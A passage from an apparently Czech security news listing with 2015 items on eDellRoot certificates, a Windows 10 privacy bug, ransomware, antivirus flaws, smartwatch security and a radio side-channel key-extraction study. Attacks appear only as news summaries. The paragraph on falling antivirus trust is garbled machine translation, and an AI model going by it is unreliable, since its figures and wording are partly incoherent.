„Ve chvíli, kdy problém bude přímo v operačním systému, bude relativně složité nebo nemožné se chránit proti některým typům útoků. S antivirem to bude jako pořídit si velmi bezpečné vchodové dveře do domu, ale klíč od nich schovat pod rohožku,“ uvedl již dříve manažer divize Windows Client společnosti Microsoft v České republice Lukáš Křovák.
Jde to i zadarmo Vhodným řešením je tak z bezpečnostního hlediska přechod na novější systém. Vybírat uživatelé přitom nemusejí pouze ze stáje Windows – k dispozici mají i řadu bezplatných alternativ. [celá zpráva]
„Po tomto pravděpodobně již posledním hřebíčku do rakve dlouhou dobu nejoblíbenějšího OS již mají uživatelé pouze možnost přechodu na výkonnější hardware s novým operačním systémem, nebo nahradit XP některým z open source operačních systémů, jako GNU Linux či BSD,“ uzavřel bezpečnostní analytik týmu CSIRT.
Aktualizace Windows 10 přepisuje nastavení soukromí
25.11.2015 Hrozby Pokud jste již stáhli aktualizaci Windows 10 z 12. listopadu tak zpozorněte. Mohla totiž přepsat nastavení vašeho soukromí.
Uživatelé, kteří svůj operační systém Windows 10 aktualizovali na jeho nejnovější verzi, by si měli zkontrolovat své nastavení. Microsoft odstranil update vydaný 12. listopadu svých stránek kvůli problému, který po instalaci aktualizace resetoval veškerá nastavení soukromí.
Bug resetoval nastavení kvůli tomu, aby reklamní inzerenti mohli snáze monitorovat pohyb uživatelů v aplikacích. Díky tomu měly informace o uživatelích internetem proudit daleko hladčeji. Microsoft však v úterý vydal opravu problému. Ti, kteří si aktualizaci systému nainstalují nyní, tak podobnou chybu nezažijí.
Uživatelé, kteří chybu zažili, se rovněž nemusí bát. Microsoft totiž podle svých slov veškeré nastavení vrátí do jeho původní podoby. Jak toho chce docílit, však firma neuvedla.
Problém podle oficiálního vyjádření Microsoftu postihnul jen velmi malé množství zařízení. Společnost však stále netuší, co chybu způsobilo.
Načasování tohoto bugu však pro Microsoft není ideální. Společnost čelí obavám ze zvýšeného sběru dat o uživatelích ve Windows 10. Ty sice nabízejí nastavení, které veškerý sběr dat, až na telemetrická data, vypnou, ale pokud dokáže jednoduchý bug tato nastavení prolomit, nemohou být naprosto spolehlivá.
Dell instaloval do notebooků nebezpečné certifikáty
24.11.2015 Hrozby „Vadné“ certifikáty na noteboocích XPS 15, XPS 13, ale taky na některých z řad Latitude a Inspiron útočníkům umožní špehovat, co na internetu děláte.
Dell do svých notebooků přednahrál kořenové digitální certifikáty s vlastním podpisem, které útočníkům umožňují sledovat přístupy k zabezpečeným webovým stránkám. Informace se objevila na serveru Reddit, následně ji však na svých blozích či sociálních sítích potvrdili další uživatelé a IT odborníci.
Navíc, k certifikátu je připojen i odpovídající soukromý klíč, což situaci činí ještě horší. S klíčem může totiž kdokoliv vygenerovat certifikát pro kteroukoliv webovou stránku, již budou internetové prohlížeče na daných počítačích považovat za důvěryhodnou.
Certifikát nazvaný eDellRoot je od srpna přidáván do běžně prodávaných notebooků, podle Dellu za účelem zlepšení zákaznické podpory: „Když se počítač spojí s naší online podporou, certifikát nám umožní okamžitě identifikovat typ počítače, ovladače, operační systém, hard disk a tak dále, což vede ke snadnějšímu a rychlejšímu řešení problému.“
Po upozornění na „vedlejší účinky“ však firma zákazníkům poskytla manuál k odstranění certifikátu a přislíbila, že do dalších počítačů ho už předinstalovávat nebude.
„Rádi bychom taky dodali, že bez svolení zákazníka neshromažďujeme ani nesdílíme žádné jeho osobní informace.“
Chyby lze zneužít prostřednictvím takzvaného man in the middle útoku, kdy se útočníci napojí do komunikace mezi dvěma subjekty, v tomto případě uživatelem s inkriminovaným Dell notebookem a jakoukoliv zabezpečenou stránkou. Útočníci můžou využít rovněž soukromého klíče k tomu, aby do počítače dostali malware.
„Kdybych byl záludný hacker, zašel bych na nejbližší letiště, sedl si vedle prostoru pro první třídu a odposlouchával, kdo co na internetu řeší,“ píše ve svém blogovém příspěvku Robert Graham, šéf bezpečnosti společnosti Errata Security. „Navrhuju první třídu, protože jestliže si můžou takoví lidé dovolit dát deset tisíc dolarů za letenku, určitě mají v počítači něco zajímavého.“
Kolik uživatelů, respektive počítačů může daný certifikát mít, není zcela jasné. Uživatelé však hlásí problémy na modelech Dell XPS 15, XPS 13, ale taky na některých z řad Latitude a Inspiron.
A nejste-li si jistí, můžete zkusit navštívit tuhle stránku – jestli se vám otevře bez nahlášení chybějícího certifikátu, pak má váš počítač eDellRoot předinstalován. Ve Windows ho můžete snadno odstranit pomocí tzv. Microsoft Management Console, kterou otevřete následovně: klávesa Win + R, do vyhledávacího řádku napište certlm.msc a spusťte. Certifikát byste měli najít v adresáři Trusted Root Certificate Authorities > Certificates.
Kauza připomíná nedávný problém Lenova, které do některých svých počítačů předehrávalo adware Superfish, který jednak ve webových prohlížečích zobrazoval nežádoucí reklamy a navíc používal vlastní certifikáty pro šifrované HTTPS. Později se za tento adware společnost omluvila a uživatelům poskytla nástroj na jeho odstranění.
Co si odnést z návodu ISIS pro bezpečnou komunikaci na internetu
23.11.2015 Hrozby
V reakci na válku, kterou Anonymous vyhlásili ISIS, zveřejnili teroristé manuál pro bezpečnou komunikaci na internetu. Co se z něj dozvíte? Tajné služby, Francie, Belgie a Spojené Státy se předháněly v tom, jak prý útočníci v Paříži využívali šifrování (dokonce včetně nesmyslů o využívání PlayStation4 na základě JEDNÉ nalezené herní konzole). Pak se ale ukázalo, že útočníci byli neopatrní, naivní a nejenže neřešili šifrování, ale dokonce ani možnost vysledování přes mobilní telefony.
Poněkud se to strašení teroristy, které tajné služby a policie používají jako hlavní argument pro postavení šifrování mimo zákon, nedaří. A ještě hůře to dopadne, pokud si prostudujete návod (PDF například zde, ale pozor, jde o překlad přes Google Translate), který ISIS poskytuje svým příznivcům. Zjistíte například, že nevěří Androidu ani iPhonům a že nepovažuje za bezpečné ani žádné oficiální šifrované komunikační nástroje.
V návodu na bezpečné používání internetu najdete v zásadě to, co doporučuje každý jiný podobný návod. V ISIS se to pochopitelně řeší v jiné souvislosti: jak provádět podvratné aktivity a přitom zajistit to, aby byl šiřitel nevystopovatelný, nebo alespoň obtížně vystopovatelný.
Zmíněný návod vznikl už zhruba před rokem a nejde o návod na míru pro ISIS. Je dílem společnosti Cyberkov z Kuvajtu a měl sloužit hlavně žurnalistům a politickým aktivistům v Gaze. V originále je k nalezení zde.
Co konkrétně v návodu najdete
Dočtete se tam obvyklá varování ohledně hesel, potřeby zabezpečit účet proti hacku, vypnutí GPS, potlačení EXIF ve fotografiích či nutnosti používat https připojení. Je zde jasně řečeno, že „privátní“ zprávy na Twitteru nejsou ve skutečnosti privátní. Pro geolokační informace je doporučováno používat falšování, třeba s použitím aplikace Mappr (či jiné).
Instagram návod zmiňuje jako zcela nevhodný prostředek, Facebook kritizuje pro špatnou reputaci v oblasti ochrany soukromí. Ze bezpečné nepovažuje ani GSM sítě, šifrování v nich je prý dobré pouze pro „průměrného“ uživatele. Doporučuje proto používání telefonů jako je CryptoPhone nebo BlackPhone od SilentCircle. Zmiňuje i Tails, operační systém, který lze spustit prakticky kdekoliv z DVD/USB či SD karty.
Pro sdílení informací doporučuje privátní Wi-Fi sítě, využití Twitteru přes SMS místo přes internet, aplikace jako FireChat, Tin-Can, The Serval Project. Velmi důsledně zdůrazňuje to, že většina informací přenášených přes internet není šifrována – doporučuje proto používat VPN, včetně služeb jako je Freedome, Avast SecureLine! a pochopitelně Tor Browser a Orbot, Onion Browser, Aviator či Opera Mini.
Důraz klade i na šifrování samotných zařízení, ať už přímo podporovaného Androidem a iOS, nebo pomocí softwaru jako je TrueCrypt (jeden z řady z poněkud kontroverzních nápadů), VeraCrypt a BitLocker ve Windows. Doporučuje i použití pevných disků, které jsou šifrováním přímo vybavené.
U e-mailových služeb návod doporučuje, že je lepší volit ty „ne-americké“, zmiňuje třeba Hushmail, ProtonMail, Tutanota. Pro přímou komunikaci podle něj nelze věřit aplikacím jako je WhatsApp či Line. Mezi těmi důvěryhodnějšími je Threema, Telegram, SureSpot, Wickr, Cryptocat Service, IO SwissCom, PQChat, Sicher. iMessage od Apple považuje za bezpečný, ale upozorňuje na omezení pouze na tuto platformu a možné problémy při snaze poslat informace přes SMS místo bezpečným kanálem.
Návod věnuje pozornost také nutnosti šifrovat VOIP. Varuje před Skypem, který prý některé tajné služby prý umí číst. Doporučovaným softwarem je Linphone, opět IO Swisscom, Silent Circle s RedPhone a Signal. Vhodný je podle manuálu i FaceTime, který je prý vhodnější než klasické telefonování.
U cloudových úložišť návod jasně vylučuje Dropbox, protože tam pracuje Condoleezza Rice, a také proto, že před Dropboxem varoval Edward Snowden. Paradoxní je, že doporučuje využít MEGA, poněkud rozumněji už vypadá doporučení na SpiderOak, SugarSync, Copy.com.
Kancelářský open space jako bezpečnostní riziko? Větší, než se zdá
14.11.2015 Hrozby Jaké hrozby zabezpečení dat otevřený prostor přináší a jak tento problém se zabezpečením mohou bezpečnostní profesionálové vyřešit?
Stále více firem v současné době opouští tradiční rozvržení místností a uzavřených kanceláří ve prospěch otevřeného prostoru (open space). Společnosti jako Facebook nebo Google před potenciálními zaměstnanci propagují svá řešení otevřeného prostoru a vychvalují, že tyto konstrukce umožňují pracovat více pohromadě a podporují kulturu spolupráce.
Trend open space se v dohledné době nezmění: podle asociace IMFA (International Management Facility Association) nyní pracuje 70 procent zaměstnanců v USA v prostředí otevřeného prostoru.
Facebook pdole svých slov pracuje na dalším rozšíření, které navrhl Frank Gehry. Po jeho dokončení na jaře 2015 tak bude v centrále v Menlo Parku tohoto tvůrce sociální sítě největší pracoviště s otevřeným prostorem na světě.
Jedna věc je jistá – otevřený prostor se snaží najít rovnováhu mezi udržením soukromí a veřejným přístupem, a to významně mění způsob ochrany důvěrných a citlivých informací společností.
Vyvolává to ale otázku: jaké hrozby zabezpečení dat otevřený prostor přináší a jak tento problém se zabezpečením mohou bezpečnostní profesionálové vyřešit?
Hrozba vizuálního hackingu
Vizuální hacking, neboli akt sledování či zachycování citlivých, tajných a soukromých informací pro neoprávněné použití, je hlavním rizikem bezpečnosti dat v epoše otevřeného prostoru.
Se zaměstnanci, kteří pravidelně mění pracoviště, je pro dodavatele, třetí strany a dokonce pro zločinné pracovníky relativně snadné spatřit tajné informace nebo získat přihlašovací údaje k dalšímu průniku do databází společnosti z obrazovky nebo kopie souboru.
S pomůckami, jako jsou brýle Google Glass a vysoká kvalita kamer chytrých fotoaparátů, je poměrně snadné skrytě pořizovat snímky dat nebo přihlašovacích údajů.
Možná řešení: Týmy zabezpečení dat a ochrany osobních údajů by měly přezkoumat jak zásady společnosti, tak i fyzická řešení pro boj s vizuálním hackingem:
Použít ochranu před vizuálním únikem informací prakticky z každého úhlu pomocí spojení tradičních filtrů pro zachování soukromí s technologiemi jako 3M ePrivacy Filter a softwaru, který upozorní uživatele, že mu někdo hledí přes rameno, a rozmaže obrazovku, když se uživatel dívá jinam nebo odejde. Podporovat pracovníky, aby si uvědomovali své okolí a pootáčeli si obrazovky zařízení pryč od míst s vysokým provozem. Poučit zaměstnance, aby byly všechny počítačové monitory a displeje zařízení vypnuté a chráněné heslem, když se nepoužívají. Zavést zásadu čistého pracovního stolu a zajistit, aby zamětnanci hned po použití odstranili všechny dokumenty obsahující důvěrné informace.
Nedostatek soukromí na hovory
Stejně jako riziko, že v otevřeném kancelářském prostoru zaměstnanci uvidí informace, které by neměli, existuje i možnost, že zaslechnou hovory, jež nejsou určené pro ně.
Možná řešení: Kromě vzdělávání zaměstnanců, jaké druhy rozhovorů by se měly vést na uzavřeném místě, mohou bezpečnostní týmy chránit soukromí hovorů pomocí následujících opatření:
Využívat technologie maskovacího zvuku, jako jsou například generátory tzv. bílého a růžového šumu, aby se přehlušily rozhovory pracovníků. Vyčlenit prostor pro pracovníky k použití pro telefonní hovory a konverzace malých skupin. Zavést profesionální systém rychlých zpráv, jako je například Spark, aby mohli zaměstnanci rychle získat informace, aniž by verbálně rušili ostatní.
Zvýšené riziko krádeže zařízení a dokumentů
Když společnosti používají prostředí s otevřeným prostorem, bude tam samozřejmě každý den přicházet a odcházet velké množství jedinců. I když to může přinášet užitek ohledně spolupráce v organizaci, znamená to také vyšší počet jedinců v blízkosti zařízení a dokumentů, které obsahují důvěrné informace.
Když dojde k jejich zmizení, způsobí to velké problémy se zabezpečením dat. Institut Ponemon a Intel udělaly v roce 2010 studii, která zkoumala náklady firem na ztracené nebo ukradené notebooky.
Zjistilo se, že ačkoliv se většina notebooků ztratila mimo pracoviště a při cestování, došlo u 12 procent případů ke ztrátám či krádežím přímo na pracovišti.
Možná řešení: Týmy zabezpečení by měly přijmout taková opatření, aby se zajistila nejen ochrana proti fyzickému odcizení privátních informací, ale aby v případě krádeže řešení se škoda zmírnila dalšími bezpečnostními opatřeními:
Nařiďte, aby zařízení, brašny, kufříky, složky apod., které obsahují důvěrné dokumenty, nebyly ponechávané za žádných okolností bez dozoru. Vybavte kancelářské prostory bezpečnými zásuvkami nebo jinými místy pro ukládání, kde lze důvěrné dokumenty a zařízení uložit. Dejte na pracoviště uzamykací kabely pro notebooky. Vybavte všechny přístroje s přístupem k podnikovým informacím funkcemi ochrany proti krádeži, jako jsou šifrování dat a vzdálené vymazání. Nainstalujte kamery pro sledování otevřeného pracoviště, abyste udrželi odpovědné chování zaměstnanců a v nejhorším případě abyste mohli identifikovat pracovníky nebo dodavatele, kteří by z pracoviště zařízení nebo dokumenty odnesli.
Další opatření
Ve věku pracovišť s otevřeným prostorem by měly zásady a postupy firem definovat, k jakým informacím lze přistupovat, kde a kdy, a přispět tak k ochraně před těmito novými hrozbami pro bezpečnost dat, které spolu s tímto trendem přicházejí.
Vytvoření kontinuálního plánu informování a vzdělávání zaměstnanců, který by upozorňoval na potenciální rizika zabezpečení dat, spojená s otevřeným prostorem, zase může pomoci, aby se na tuto tematiku nezapomínalo.
Další spojení s fyzickými opatřeními a softwarem může pomoci udržet ochranu pracovního prostředí. Zejména ve větších společnostech mohou pracovníci zjistit, že denně spolupracují na úkolech s různými jedinci, a je na týmech zabezpečení dat, aby zajistily, že důvěrné a citlivé informace zůstanou v tomto novém prostředí v bezpečí.
FBI doporučuje obětem platit výpalné
29.10.2015 Hrozby Kdo se stal obětí vyděračského šifrovacího útoku, pro toho může být zaplacení výpalného jedinou možností. Přiznává to oficiálně i americká federální policie FBI. Přednáška agenta americké federální policie FBI Josepha Bonavolonty na odborné konferenci Cyber Security Summit, která se konala koncem října 2015 v americkém Bostonu, zaujala otevřeným konstatováním, že na šifrovací algoritmy vyděračského malware, tzv. ransomware, je policie krátká. „Ransomware je opravdu tak dobrý, že, upřímně řečeno, často obětem doporučíme zaplatit požadovanou částku,“ konstatoval Joseph Bonavolonta.
Doporučení zaplatit je v rozporu s teoretickými proklamacemi o nemorálnosti placení výpalného. Je však v souladu se zkušeností obětí. Pokud totiž jde o útoky malware, jako je Cryptolocker nebo Cryptowall, což jsou nejčastěji používané druhy ransomware, bez šifrovacích klíčů neexistuje rozumná možnost data dešifrovat. Finanční požadavky vyděračů, které se pohybují v řádu stovek dolarů, pak firmy berou jako vcelku přijatelnou pokutu za díry v IT bezpečnosti.
Alternativa k placení výpalného – přičemž ani jeho zaplacení nedává žádnou jistotu, že se oběť útoku opravdu ke svým zašifrovaným datům dostane – však alternativu má. Je to dodržování pravidel IT bezpečnosti. Jejich součástí je obezřetnost při otvírání souborů a odkazů, používání kvalitního bezpečnostního řešení a také zálohování.
Antiviry jako Kaspersky Antivirus mohou počítač vystavit ještě větším hrozbám
26.9.2015 Hrozby Antivirové aplikace a podobné bezpečnostní softwary mají zařízení svých uživatelů chránit. Avšak rostoucí počet výzkumů odhaluje, že v některých případech mohou antiviry počítač otevřít hrozbám, kterým by jinak čelit nemusel.
Posledním takovým příkladem je antivirový program společnosti Kaspersky Lab. Člen výzkumného týmu Google Project Zero Tavis Ormandy nedávno analyzoval její nejvíce využívané programy a rychle odhalil několik snadno zneužitelných bugů.
Ty mohly být využity například k dálkovému spuštění škodlivého kódu. Kaspersky již většinu těchto chyb opravil a intenzivně pracuje na nápravě těch ostatních. Ormandy však na svém blogu zveřejnil příspěvek, podle kterého Kaspersky není jediným hráčem na trhu s těmito kritickými chybami.
„Máme silné důkazy, že existuje aktivní černý trh obchodující s chybami v antivirech,“ napsal Ormandy, „Výzkumy ukazují, že právě snadno přístupný povrch softwaru dramaticky zvyšuje riziko útoků. Proto je povinností každého prodejce antivirových programů dodržovat ty nejvyšší bezpečnostní standardy a minimalizovat tak škodu způsobenou jejich softwary.“
Ormandy naznačil, že chyby, které našel v produktech Kaspersky, se dají nejpravděpodobněji zneužít ve velice úzce zaměřených útocích podobným těm, jaké americká Národní bezpečnostní agentura (NSA) prováděla proti teroristům nebo špionům.
To znamená, že většině lidí se instalace antivirového softwaru stále vyplatí. I přesto jsou však jeho výsledky znepokojivé. Ukazují totiž, že i programy, na které spoléháme při své ochraně, nás můžou ještě více poškodit. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Kaspersky není jediným poskytovatelem softwaru, který čelí chybám ve svých produktech. Čtyři kritické chyby byly tento měsíc nalezeny také v produktech prodávaných bezpečnostní společností FireEye. Jedna z nich umožňovala útočníkovi ze serveru, na kterém program běžel, získat citlivá a chráněná data. Ormandy odhalil vážné díry také v antivirových programech firem Sophos a Eset.
„Chtěli bychom naše klienty a zákazníky ujistit, že chyby, které odhalil člen týmu Google Project Zero Tavis Ormandy, již byly ve všech dotčených produktech Kaspersky Lab opraveny. Naši specialisté nenašli žádné důkazy, že byly tyto chyby jakkoliv zneužity,“ uvedli mluvčí Kaspersky Lab v oficiálním prohlášení.
Společnost dále potvrdila, že aby mohly její produkty v budoucnu čelit útokům lépe, učiní v nich několik architektonických změn. Mezi tyto úpravy patří například implementace ochrany zvané stack buffer overflow.
Další plánovaná vylepšení by se měla soustředit na zmírnění dopadů chyb, například implementace metody address space layout randomization (ASLR) nebo zabránění stahování odhalených dat. Ormandy po zveřejnění svého článku také poděkoval Kaspersky Lab za její rekordně rychlou odpověď.
Zpráva je však i přesto jasná. Aby mohly správně fungovat, musí antivirové softwary získat vysoce privilegovaný přístup k počítačům, které ochraňují. Této citlivé pozice se pak dá snadno zneužít.
Ormandy doporučil developerům antivirů, aby pro své produkty vybudovali bezpečnostní sandboxy, které budou izolovat stažené soubory od hlavních částí počítačového operačního systému.
HP: chytré hodinky nejsou dostatečně bezpečné
28.7.2015 Hrozby Americká společnost Hewlett-Packard zveřejnila výsledky studie, podle které nejsou dostatečně bezpečné žádné z populárních chytrých hodinek, jež jsou v současné době na trhu.
HP ve studii zkoumalo deset chytrých hodinek a hledalo v nich potenciální rizika, která by mohla ohrozit jejich uživatele - prověřovány byly například technologie používané k ochraně hesel či uložených dat. Výsledek? U všech hodinek bylo nalezeno nejméně jedno riziko.
Jak uvedl bezpečnostní expert Mark James ze společnosti Eset, je zřejmé, že by výrobci smartwatch měli na zabezpečení svých zařízení klást větší důraz. „Tím, že je trh s chytrými hodinkami tak dynamický a rychle se mění, jsou jednotliví výrobci často nuceni vydávat svá zařízení co nejdříve bez ohledu na to, zda jsou bezpečná,“ uvedl James.
HP podle svých slov testovalo 10 nejpopulárnějších smartwatch a hledalo v nich přítomnost bezpečnostních prvků doporučených iniciativou Open Web Application Security Project (OWASP). Cílem OWASP je pomoci výrobcům nositelné elektroniky lépe pochopit bezpečnostní hrozby spojené s internetem věcí.
Z výsledků studie vyplývá, že:
- jen polovina hodinek obsahuje funkci zámku, která by zabránila v přístupu k datům na nich uložených nepovolaným osobám
- devět z deseti smartwatch odesílá data v nešifrované podobě
- třetina hodinek nijak neomezuje počet loginů, díky čemuž útočníci mohou po neomezenou dobu hádat hesla
- dvoje hodinky je možné v případě krádeže jednoduše spárovat s jiným telefonem
Jak uvedlo HP, „výsledky naší studie nás zklamaly, ale nebyly příliš překvapující.“ Podle Daniela Miesslera, který výzkum vedl, začnou výrobci do zabezpečení hodinek investovat až poté, co se o tuto oblast začnou více zajímat zákazníci.
Miessler odmítl sdělit, které hodinky byly testovány, avšak dodal, že HP předalo potřebné informace jejich výrobcům.
Vyvarujte se "nejhorších postupů" v oblasti bezpečnosti
14.7.2015 Hrozby V souvislosti s doporučenými postupy je většinou řeč o „best practices“; tedy o procesech, jež se už jinde osvědčily a které tak není nutné pracovně znovuobjevovat. Ovšem zkusme se na celou věc podívat přesně opačnou praktikou: skrze „worst practices“, tedy ty nejhorší postupy.
Mnohdy máme bezpečnostní politiku, ale nikoliv bezpečnostní koncepci. V praxi to pak vypadá tak, že „najdu chybu, koupím produkt“. Vychází to i z logiky, že po incidentu se mnohem snáze argumentuje u vedení firmy s tím, že musíme udělat všechno pro to, aby se něco podobného neopakovalo.
Druhá logika za touto filozofií je, že na každý problém existuje nástroj. To ale není pravda. Nástroje totiž někdo konfiguruje a monitoruje. Jinými slovy: nástroje tu jsou pro to, aby pomáhaly, a ne aby nahrazovaly nebo vykonávaly.
Třeba IDS a IPS (a nazvěme je, jak chceme) nejsou po vybalení připravené a je třeba je nakonfigurovat na to, co mají dělat a co mají hledat. A i nadále je o ně třeba pečovat. Když už nic jiného, pak neustále studovat a vyhodnocovat logy – a na jejich základě zpětně donekonečna systémy ladit.
Druhou základní chybou je ignorování lidského faktoru. Příklad? Vynucování dlouhého a často měněného hesla, které se navíc nesmí opakovat. Z čistě technicistního pohledu je to správné, ale...
Opravdu dáte ruku do ohně za to, že uživatelé se každé dva týdny (nebo i častěji) budou nazpaměť drtit čtrnáctiznakové heslo? Brzy si najdou způsob, jak systém obejít, a heslo si budou poznamenávat, sdílet, budou používat velmi podobná hesla...
Chyby autoritativního přístupu
Právě postup „nastavíme“, „zablokujeme“ a „zakážeme“ je pro mnoho řešení bezpečnostních problémů typický. Jenže prosazování politiky není tak jednoduché: ostatně když administrátor nedokáže správně nastavit stroj, aby něco zablokoval (protože to třeba nejde nadefinovat, např. „podezřelé přílohy“), přece to nemůže chtít po uživatelích bez technického vzdělání.
Nesmíme zkrátka zapomínat na to, že některé politiky jsou technické (změňte heslo!), některé organizační (nepište si heslo na žluté papírky!). A že jsou si rovnocenné.
Ostatně právě autoritativní přístup ze strany IT oddělení je dalším častým prohřeškem. „Ve jménu bezpečnosti, to se nesmí!“ Nehledá se pak řešení, hledá se tlačítko „vypnout“.
Někteří IT manažeři prosazují klasický český přístup „ano, ale“. S navrženým požadavkem souhlasí, ale ihned přidávají vyjádření rizika a dotaz, zda si tazatel vezme na své triko zodpovědnost za případné problémy.
Což je ovšem druhý extrém, protože cokoliv jiného než zákaz s sebou vždy nese bezpečnostní riziko. „Best practice“ se v daném případě ovšem hledá těžko: mohli bychom hovořit o nutnosti nalézat řešení nebo domluvit se na kompromisu, ovšem všichni víme, jak podobným poučkám navzdory svět skutečně funguje. Nejlepším způsobem dosažení cíle tak zřejmě zůstává metoda postupných kroků.
Všechna data jsou si rovná, představuje další nesprávný – ale hojně využívaný – předpoklad. Ano, detailní rozpočty obchodních nabídek jsou si rovné s žádostmi o dovolené. Ne? Samozřejmě máte pravdu.
Ovšem nejde jen o různé úrovně důležitosti dat, ale třeba i o rovnost elektronických a tištěných dat. Jednou se klade důraz na jednu kategorii, jindy na druhou, ale bohužel se lze jen vzácně setkat se situací, kdy se řeší rovným způsobem.
Není tomu tak dávno, co útočníci získávali informace cestou dumpster divingu, volně „ponoření se do odpadků“. Interní telefonní seznamy, rozpracované nabídky nebo kartičky s narychlo zapsanými údaji končily v odpadkových koších a následně v popelnicích. Pak se pozornost přesunula k nezabezpečeným elektronickým datům a dnes se opět vrací k odpadkovým košům.
Nepravidelné dělání auditů a penetračních testů představuje další častý hřích. Komplexnost dnešních systémů dramaticky narůstá, aktualizace či modernizace jsou velmi časté.
Dříve dostačující dva roky mezi audity se proto jeví až jako nekonečně dlouhé. Obecně je lepší provádět je každý rok – a v případě výrazných změn i častěji. Stejně tak je třeba kontrolu svěřit do ruky třetí strany.
Nerado to dělá vedení firmy („stojí to peníze“), neradi to dělají administrátoři (formálně tvrdí, že to zvládnou sami, reálně si nechtějí nechat nahlížet do karet). Ovšem myšlenka „je dobrý, tak ať si zkontroluje svoji vlastní práci“ asi není úplně nejlepší.
Neviditelná bezpečnost
Minimálně diskutabilní je neviditelná bezpečnost. Tedy taková opatření, která nejsou vidět. Druhým extrémem je pochopitelně nekonečné přihlašování do různých systémů, vyskakování varovných hlášení nebo informací, že to a to bylo prověřené.
Jenže když bezpečnost uděláme „neviditelnou“, má to své negativní důsledky. V uživatelích převládne dojem, že žijí v divokém světě a že si mohou dovolit všechno. „Občasné upozornění na prohřešky třeba s návštěvou nepovolených stránek nebo ukládáním nelegálního obsahu udělá zázraky,“ shodují se bezpečnostní specialisté.
Třeba pouhým nasazením systému monitorování a klasifikace internetového provozu dochází typicky k jeho poklesu o dvě třetiny. Jenže po nějakém čase se uživatelé osmělí a provoz roste: samozřejmě že správně pak není nasadit další systém, ale elegantně jim jeho prostou existenci připomenout.
Není přitom nutné rozdávat exemplární tresty: často stačí jen upozornit, šeptanda pak vykoná své…
Důvěra v antivirové klesá na historické minimum 2.7.2015 Hrozby Zatímco zájem o riziko koncového uživatele přetrvává, důvěra slábne v tradičních bezpečnostních řešení detekce na bázi, jako jsou antivirové a firewallů. Místo toho, zájem se přesouvá směrem k řešení bezpečnostních prevence založené, jako je například izolace endpoint hrozeb, podle nové zprávy bromem. Menší důvěra v detekčních řešení dědictví - Drtivá většina respondentů (92 procent) uvedla, že ztratili důvěru ve schopnost tradičních řešení pro ochranu koncových bodů, jako jsou antivirové a bílou seznam, odhalit neznámé hrozby, jako zero-day útoků. Navíc, 78 procent věří, antivirus není účinný proti obecné kybernetickými útoky. izolace Endpoint hrozba je nejvíce efektivní - Pokud vyzváni k výběru ze seznamu bezpečnostních řešení, odborníci bezpečnostní informační uvedlo, že zváží izolace Endpoint hrozba nejvíce efektivní řešení při předcházení kybernetickým hrozbám ( 58 procent). Téměř jedna třetina řekl řešení založené na síti jsou efektivní; 28 procent má víru v narušení prevenci odhalování / narušení (IDS / IPS); a 27 procent si, že síťové karantény jsou účinné. koncoví uživatelé zdrojem největšího rizika - téměř dvě třetiny respondentů (62 procent) se domnívá, že uživatelé jsou jedním z největších zdrojů bezpečnostní riziko. Navíc, více než jedna čtvrtina citovaný nastupujících cloudových a mobilních technologií, které snižují řídit IT; 29 procent citoval cloud služeb; a 29 procent uvedlo, mobilních zařízení mezi top zdrojů rizika. Prevence je základem bezpečnosti - většina respondentů (58 procent) se domnívá, že prevence, jako je kalení a izolačních systémů, je nejvíce foundational aspekt bezpečnostní architektury, ve srovnání s 23 procent, který citoval detekce, o 16 procent, který citoval odpověď (šetření / sanace), a 34 procent, který řekl, Predictive Analytics.
Ukážeme vám, že šifrování dat může být zbytečné, když jste v blízkosti rádia
29.6.2015 Hrozby
Každý týden se setkáváme s útoky na počítače uživatelů, které jsou si často dost podobné. Tentokrát tu máme originální přístup výzkumníků z Univerzity v Tel Avivu. Ti zveřejnili článek [PDF] popisující takzvaný side-channel útok, při kterém jsou schopní na základě analýzy magnetického pole vyzařovaného běžným notebookem extrahovat dešifrovací klíč pro algoritmy RSA a ElGamal. K útoku je možné použít běžný rádiový přijímač, nebo softwarový rádiový přijímač do USB s jednoduchou anténou.
Softwarový rádiový přijímač s anténou a malým počítačem Rikomagic, který odesílá nasbíraná data po Wifi. To vše včetně antény je možné vtěsnat do pita chlebu.
Na webu útoku uvádějí, že se jim podařilo během několika sekund úspěšně extrahovat klíče z různých typů notebooků, na kterých běželo GnuPG. Vzdálenost přijímače od cílového notebooku byla 50 centimetrů. Vzhledem k velikosti přijímače by nebyl problém ho ukrýt například do peněženky nebo do pita chlebu, jak udávají na webu.
Při útoku je na cílový notebook odesláno několik specifických zašifrovaných textů. Při jejich dešifrování dochází k výskytu specificky strukturovaných hodnot v dešifrovacím programu a ty způsobují měřitelné výkyvy v elektromagnetickém poli notebooku. Výzkumníkům se podařilo odvodit závislost mezi těmito výkyvy a jednotlivými bity klíče. Pomocí zpracování a kryptoanalýzy těchto odchylek je tedy možné klíč určit.
Myslete na tento útok, až budete příště na svém notebooku dešifrovat data v blízkosti rádia nebo třeba chleba.
K zachycení signálu stačí i běžné rádio, které je v tomto případě připojené do audio konektoru telefonu HTC EVO 4G, ve kterém se signál nahrává.
Na počítačích Samsung nefungují updaty Windows, uživatelé v ohrožení
26.6.2015 Hrozby Na svých desktopech a noteboocích Samsung vypíná službu Windows Update, díky čemuž jsou uživatelé těchto zařízení ohroženi i těmi bezpečnostními riziky, na něž již byly vydané aktualizace.
Microsoft vypnutí Windows Update na počítačích Samsungu potvrdil s tím, že o celé věci s korejskou společností jedná. Jak dodal mluvčí Microsoftu, americký gigant „vypnutí či úpravu nastavení Windows Update obecně nedoporučuje, jelikož uživatele vystavuje vyššímu bezpečnostnímu riziku.“
Na problém jako první přišel IT expert Patrick Barker, podle kterého způsobuje vypnutí Windows Update systém Samsungu, který se stará o aktualizace jeho vlastního softwaru.
Jak uvedl Barker v úterý na svém blogu, balíček SW Update předinstalovaný na počítačích Samsungu obsahuje soubor Diable_Windowsupdate.exe, který dělá přesně to, co byste dle jeho názvu očekávali: blokuje spuštění aplikace Windowsupdate.exe.
Disable_Windowsupdate.exe je podepsán vlastním digitálním certifikátem Samsungu a lze jej nainstalovat na všechny verze Windows od XP až po nejnovější Windows 10.
Podle expertů zatím není jasné to, zda SW Update uživatelům stahuje z Windows Update alespoň některé aktualizace, či zda jsou po vypnutí Windows Update zcela ponecháni napospas hackerům.
Jak vedl viceprezident konzultantské společnosti New Context Andrew Storms, je také možné, že Samsung pomocí svého aktualizačního mechanismu uživatelům distribuuje „své vlastní verze patchů.“ I tento přístup by však byl velmi nestandardní. Samsung se k celé věci zatím nevyjádřil.
Spousta peněz za telefon? To se nikomu nelíbí
